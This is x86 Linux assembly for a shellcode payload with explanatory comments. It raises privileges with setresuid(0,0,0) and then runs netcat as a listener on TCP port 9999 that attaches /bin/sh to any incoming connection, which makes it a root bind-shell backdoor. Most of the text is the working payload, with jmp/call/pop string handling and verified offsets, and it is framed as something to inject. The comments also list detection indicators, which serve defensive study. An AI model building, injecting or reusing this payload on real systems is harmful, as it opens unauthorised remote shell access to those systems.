;netcat backdoor to inject as a shellcode
;
; What this is (analyst notes): Linux x86 32-bit (int 0x80) position-independent
; payload. It calls setresuid(0,0,0) and then
; execve("/bin/nc", ["/bin/nc", "-lvp9999", "-e/bin/sh"], envp), where envp
; points at a NULL entry - i.e. it starts a netcat listener on TCP port 9999
; that attaches a shell to whoever connects.
; Layout: the trailing db string is reached by the jmp/call/pop idiom (jmp to
; `todo`, call back to `shellcode`, pop the pushed "return address" = string
; address into esi). All [esi + N] offsets below are tied to that string's
; exact layout; the index ruler on the last line is the reference for N.
; Detection handles: the strings "/bin/nc", "-lvp", "-e/bin/sh" are stored in
; cleartext inside the payload; at runtime it appears as an nc process with
; -l/-p/-e arguments and a new listening socket, spawned from an unexpected parent.

jmp short todo                  ; jump to the call so the string address ends up on the stack

shellcode:

xor eax, eax ; Zero out eax

xor ebx, ebx ; Zero out ebx (ruid = 0)

xor ecx, ecx ; Zero out ecx (euid = 0)

xor edx, edx ; Zero out edx (suid = 0); xor clears it directly, no cdq needed

mov BYTE al, 0xa4 ; setresuid syscall 164 (0xa4)

int 0x80 ; syscall execute

pop esi ; esi = address of the db string (pushed by `call shellcode`)

xor eax, eax ; Zero out eax

mov[esi + 7], al ; null terminate /bin/nc (overwrites the '#' at index 7)

mov[esi + 16], al ; null terminate -lvp9999 (overwrites the '#' at index 16)

mov[esi + 26], al ; null terminate -e/bin/sh (overwrites the '#' at index 26)

mov[esi + 27], esi ; store address of /bin/nc in AAAA (argv[0])

lea ebx, [esi + 8] ; load address of -lvp9999 into ebx

mov[esi +31], ebx ; store address of -lvp9999 in BBBB taken from ebx (argv[1])

lea ebx, [esi + 17] ; load address of -e/bin/sh into ebx

mov[esi + 35], ebx ; store address of -e/bin/sh in CCCC taken from ebx (argv[2])

mov[esi + 39], eax ; Zero out DDDD (argv[3] = NULL; also reused as envp)

mov al, 11 ; 11 is execve syscall number

mov ebx, esi ; ebx = filename, address of /bin/nc

lea ecx, [esi + 27] ; ecx = argv, address of the AAAA..DDDD pointer array

lea edx, [esi + 39] ; edx = envp, points at the zeroed DDDD (empty environment)

int 0x80 ; syscall execute

todo:

call shellcode                  ; pushes the address of the db string as the return address

db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD'

; index ruler for the [esi + N] offsets used above (the '#' bytes become NULs)
; 0123456789012345678901234567890123456789012